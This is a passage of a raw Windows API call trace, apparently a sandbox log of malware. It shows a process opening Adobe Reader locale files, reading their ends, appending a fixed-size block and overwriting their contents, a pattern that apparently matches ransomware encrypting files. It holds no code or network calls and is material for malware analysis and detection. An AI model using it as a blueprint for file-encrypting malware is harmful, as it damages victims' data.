[0075.023] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0075.023] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.023] CloseHandle (hObject=0x1cc) returned 1 [0075.024] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\eBook.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\ebook.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0075.024] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0075.024] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1c00 [0075.024] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0075.024] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.025] ReleaseMutex (hMutex=0x168) returned 1 [0075.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.HUN", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0075.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.HUN", cchWideChar=9, lpMultiByteStr=0x1f7366c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.HUN", lpUsedDefaultChar=0x0) returned 9 [0075.025] ReadFile (in: hFile=0x1cc, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x311f2bc*=0x1c00, lpOverlapped=0x0) returned 1 [0075.650] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0075.672] WriteFile (in: hFile=0x1cc, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x2188, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x311f2d0*=0x2188, lpOverlapped=0x0) returned 1 [0075.676] CloseHandle (hObject=0x1cc) returned 1 [0075.676] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\ReadOutLoud.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\readoutloud.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0076.127] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.128] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2a00 [0076.132] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.132] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.132] ReleaseMutex (hMutex=0x168) returned 1 [0076.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.HUN", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0076.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.HUN", cchWideChar=15, lpMultiByteStr=0x1f7342c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.HUN", lpUsedDefaultChar=0x0) returned 15 [0076.133] ReadFile (in: hFile=0x1ec, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.134] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1a00 [0076.135] ReadFile (in: hFile=0x1ec, lpBuffer=0x2872fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.135] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1a00 [0076.136] WriteFile (in: hFile=0x1ec, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.136] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0076.136] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.136] CloseHandle (hObject=0x1ec) returned 1 [0076.137] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\updater.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\updater.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0076.137] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.137] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2800 [0076.137] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.137] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.137] ReleaseMutex (hMutex=0x168) returned 1 [0076.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.HUN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.HUN", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.HUN", lpUsedDefaultChar=0x0) returned 11 [0076.138] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.140] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1800 [0076.140] ReadFile (in: hFile=0x1ec, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.141] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1800 [0076.141] WriteFile (in: hFile=0x1ec, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.141] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0076.142] WriteFile (in: hFile=0x1ec, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.142] CloseHandle (hObject=0x1ec) returned 1 [0076.142] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\DigSig.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\digsig.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0076.143] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.143] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x21200 [0076.143] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.143] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.143] ReleaseMutex (hMutex=0x168) returned 1 [0076.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.ITA", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0076.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.ITA", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.ITA", lpUsedDefaultChar=0x0) returned 10 [0076.143] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0076.145] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x20200 [0076.145] ReadFile (in: hFile=0x1ec, lpBuffer=0x28725b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x28725b8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.146] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x20200 [0076.147] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.147] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0076.147] WriteFile (in: hFile=0x1ec, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0076.147] CloseHandle (hObject=0x1ec) returned 1 [0076.148] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\PPKLITE.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\ppklite.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0076.149] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.149] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x82e00 [0076.149] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.149] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.149] ReleaseMutex (hMutex=0x168) returned 1 [0076.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.ITA", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.ITA", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.ITA", lpUsedDefaultChar=0x0) returned 11 [0076.149] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0076.152] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.153] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x81e00 [0076.154] ReadFile (in: hFile=0x1ec, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.155] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x81e00 [0076.156] WriteFile (in: hFile=0x1ec, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.157] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0076.157] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0076.158] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.158] CloseHandle (hObject=0x1ec) returned 1 [0076.158] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0076.159] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.159] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe7 [0076.159] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.159] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.159] ReleaseMutex (hMutex=0x168) returned 1 [0076.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f733cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0076.159] ReadFile (in: hFile=0x1ec, lpBuffer=0x26bf2f8, nNumberOfBytesToRead=0xe7, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26bf2f8*, lpNumberOfBytesRead=0x311f2bc*=0xe7, lpOverlapped=0x0) returned 1 [0076.160] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0076.160] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x66f, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x311f2d0*=0x66f, lpOverlapped=0x0) returned 1 [0076.161] CloseHandle (hObject=0x1ec) returned 1 [0076.161] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\BRdlang32.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\brdlang32.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0076.162] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.162] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2400 [0076.162] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.162] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.162] ReleaseMutex (hMutex=0x168) returned 1 [0076.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.JPN", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.JPN", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.JPN", lpUsedDefaultChar=0x0) returned 13 [0076.163] ReadFile (in: hFile=0x1ec, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.164] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1400 [0076.164] ReadFile (in: hFile=0x1ec, lpBuffer=0x2872fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.166] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1400 [0076.166] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e958a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e958a8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.166] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0076.166] WriteFile (in: hFile=0x1ec, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.166] CloseHandle (hObject=0x1ec) returned 1 [0076.167] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Multimedia.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\multimedia.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0076.167] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.167] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xf200 [0076.168] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.168] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.168] ReleaseMutex (hMutex=0x168) returned 1 [0076.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.JPN", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0076.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.JPN", cchWideChar=14, lpMultiByteStr=0x1f7346c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.JPN", lpUsedDefaultChar=0x0) returned 14 [0076.168] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0076.561] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xe200 [0076.561] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.885] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xe200 [0076.892] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.914] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0076.914] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.922] CloseHandle (hObject=0x1ec) returned 1 [0076.922] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 